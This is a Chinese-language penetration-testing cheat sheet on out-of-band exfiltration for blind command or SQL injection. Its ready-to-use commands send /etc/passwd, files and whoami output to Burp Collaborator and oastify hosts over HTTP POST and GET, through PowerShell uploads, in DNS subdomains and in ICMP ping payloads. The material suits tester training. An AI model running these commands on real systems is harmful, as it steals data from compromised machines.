0x01 說明

滲透測試時有些時候會遇到執(zhí)行命令/SQL注入看不到回顯的情況無法確認(rèn)命令是否執(zhí)行成功，這個時候一般常見做法是：

• 如果有Web服務(wù)，那么可以在Web目錄下創(chuàng)建一個文件，然后通過http訪問該文件即可（將命令執(zhí)行結(jié)果寫入到文件）
• 通過DNSlog平臺以將數(shù)據(jù)拼接為子域名，然后通過字符串解碼獲取數(shù)據(jù)
• 通過將數(shù)據(jù)POST/GET到自建的HTTP Server上來獲取數(shù)據(jù)
• 通過ICMP獲取數(shù)據(jù)

0x02 相關(guān)命令

一般情況下Linux執(zhí)行拼接字符串中的命令可以使用如下兩種方式：

# 使用反引號``:
echo `whoami`
# 使用$()進(jìn)行變量引用
echo $(whoami)

若使用反引號后dnslog顯示反引號內(nèi)容則說明該機(jī)器是windows
以下內(nèi)容使用Burp Suite的Collaborator Client進(jìn)行演示

1. POST數(shù)據(jù)到HTTP服務(wù)

• linux：

echo 'test post data!' | curl -X POST -d @- rwr4322hirsq7p1i2ep090rz7qdh16.burpcollaborator.net
curl http://rwr4322hirsq7p1i2ep090rz7qdh16.burpcollaborator.net --request --data "`test post data | base64`"
# 讀文件
cd  /etc && curl -X POST -d @passwd le3d1eunmz71803526rkra7mhdn4bt.burpcollaborator.net
curl -X POST -T /etc/passwd le3d1eunmz71803526rkra7mhdn4bt.burpcollaborator.net

• windows：

webclient支持win7/win server2008
可回顯命令執(zhí)行結(jié)果

powershell (New-Object System.Net.WebClient).UploadString('http://dnslog','POST', $(ipconfig))

invoke-webrequest 需要 win8/win server2012 以上版本才能執(zhí)行

powershell -c "$body=Get-Content -path C:\Users\administrator\desktop\1.txt;invoke-webrequest -uri http://k0lbj85v366gcd7a58drhbrhw82zqo.oastify.com -method Post -body $body"

2.GET數(shù)據(jù)到HTTP服務(wù)

# 未編碼數(shù)據(jù)
curl rwr4322hirsq7p1i2ep090rz7qdh16.burpcollaborator.net/`whoami`
# base64編碼
curl rwr4322hirsq7p1i2ep090rz7qdh16.burpcollaborator.net/`whoami|base64`

3. DNS子域名解析：

curl `whoami`.rwr4322hirsq7p1i2ep090rz7qdh16.burpcollaborator.net
# 由于base64編碼存在斜杠和等于號因此作為子域名傳輸時可能出現(xiàn)問題，這里使用十六進(jìn)制編碼
# 但由于子域名有長度限制，因此超出長度的應(yīng)多次發(fā)送
curl `whoami | xxd -ps`.rwr4322hirsq7p1i2ep090rz7qdh16.burpcollaborator.net

4.icmp傳輸

#接收方開啟監(jiān)聽
tcpdump 'icmp and src host 172.16.253.1' -w icmp.pcap
#發(fā)送
cat /etc/passwd | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 172.16.253.137;done
#數(shù)據(jù)導(dǎo)出
echo "0x$(tshark -n -q -r icmp.pcap -T fields -e data.data | tr -d '\n' | tr -d ':')" | xxd -r -p

0x03 相關(guān)工具和平臺

1. DNSLog平臺

• http://ceye.io
  

  ceye.io

• http://dnslog.cn
  

  dnslog.cn

• Burp Suite自帶的Collaborator Client
  

  Collaborator Client

• SQL注入dnslog工具
  

  DnslogSqli

0x04 參考

• https://xz.aliyun.com/t/2957